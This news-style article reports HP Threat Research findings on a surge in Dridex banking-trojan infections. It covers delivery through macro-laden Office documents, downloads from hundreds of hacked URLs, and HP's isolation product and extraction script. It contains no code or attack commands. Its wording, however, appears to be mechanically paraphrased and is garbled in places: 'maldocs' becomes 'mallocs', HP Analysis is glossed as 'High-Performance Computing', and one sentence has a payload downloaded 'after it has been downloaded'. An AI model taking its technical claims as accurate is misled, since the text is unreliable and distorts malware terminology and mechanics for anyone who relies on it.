Dridex Malware Attacks on the Rise According to HP Threat Research Team
It has been a long time since malicious coders discovered a way to steal information from computers for their advantage that malware has grown into a serious menace to modern communications.
Dridex is gaining popularity.
Dridex is a malicious software program that was developed with the intent of infecting computers and stealing financial information, such as online banking credentials. The software acts without the knowledge of the computer’s owner and transfers data invisibly to the malevolent party, who will then utilize the data to steal money from the computer’s owner.
HP’s Threat Research Team has discovered that Dridex malware infections have surged dramatically in recent months, with a 239 percent spike from the third quarter to the fourth quarter of 2020. Attacks have increased even again in the new year, with infection rates in the first month of the year exceeding those recorded in the entire third quarter of last year.
Tactics are constantly changing.
Dridex is an old piece of malware that was initially discovered as a Trojan in 2012. However, the digital thieves who are behind it have resisted all attempts by various anti-malware and security teams to stop it from spreading further and further. It has just lately been discovered that they are hosting their spyware on hundreds of hacked websites. Because of the large number of websites, it is extremely difficult to track down and block every URL.
Patrick Schläpfer, an HP Malware Analyst, recently published a blog post on how Dridex is currently configured:
“Dridex’s distributors frequently spread the malware through the use of infected Office documents that download the Trojan from a remote web server,” according to the company. Interestingly, from the middle of 2020, some of the malicious documents have begun to include hundreds of URLs from which the virus can be downloaded. This strategy increases the loader’s resistance against takedown actions by hosting providers and domain registrars by several orders of magnitude. It also enhances the likelihood of the payload being successfully downloaded after it has been downloaded. Network security controls, such as web proxies, would have to block hundreds of URLs rather than just one to prevent malware from being downloaded.”
The fact that its techniques are always changing makes it tough to fight successfully against it, and the sheer number of URLs makes it very hard to halt its spread completely.
HP Analysis (High-Performance Computing)
The HP Threat Research Team’s investigation reveals that the developers are extremely active and employ a variety of tactics for their attacks, many of which are highly specific:
There are now a total of six ways available for disguising the true URL. However, while this makes it impossible to determine which encoding method is being used at any given time, it demonstrates that the developers have limited themselves to certain versions, making it easier for safety experts to decode and build tactics to combat its spread.
In comparison to the previous wave of infection, each subsequent wave employs a different mechanism for concealing URLs. As of the second half of 2020, this has remained true, with samples taken from 30 different waves.
The large number of URLs disguised in the mallocs that were used to download the malware demonstrates how widespread and broad the virus’s distribution has been, as well as the scope of the Trojan’s hosting on numerous servers throughout the world.
What Causes Dridex to Spread
Dridex is disseminated through the use of many sorts of documents, notably Microsoft Word documents and Excel spreadsheets. Those in charge of Dridex send out spam emails that are meticulously prepared to entice consumers to download what appears to be a harmless spreadsheet or a piece of documentation.
If a VBA or EXCEL 4 macro is activated within the file after it has been downloaded and opened, then the file is considered complete. This results in the production of a PowerShell command or a Windows API call that is used to connect remotely to one of the numerous infected URLs and download the malicious code onto the system. Once downloaded, the virus specifically targets financial-related data, which it copies and sends to Dridex’s developers for further analysis.
Because it is executed by the computer’s user and because many security software programs fail to identify it, this type of malware assault can be extremely tough to stop. To achieve the best results, businesses should consider investing in hardware-based security.
It separates any files and links that originate from an untrusted source, such as the Internet, using hardware security technologies. The user can still open and modify files, but they will be isolated from the rest of the computer as a result of this. Regardless of whether the file is malicious, if it attempts to download and run Dridex, it will do so in a secure environment where it will not cause any damage.
HP Threat Research is a company that does research into cyber threats.
Threat information compiled by HP was based on client data received through the HP Sure Click Enterprise service. Micro-virtual machines are used to isolate and contain threats on the platform, which is driven by hardware virtualization technology. This technology allows the malware to run in isolated containers, which allows the malware to be tricked into revealing its true identity. The analysis provides researchers with a complete picture of an attempted attack, including information about how the malware behaves. This information may be used to develop security signatures that can be used to help safeguard networks from hackers, according to the researchers.
A free Python script from HP has also been developed that extracts all of the URLs from Dridex mallocs that use one of the six encoding techniques available. Researchers at HP have developed a script that may be used to block potential Dridex payload URLs and identify indicators of compromise (IOCs) as a result of their research.
If you want to learn more about Dridex malware and how to defend your PCs from the financial threat that it poses, you can read the most recent report by the HP Threat Research team, which can be found here.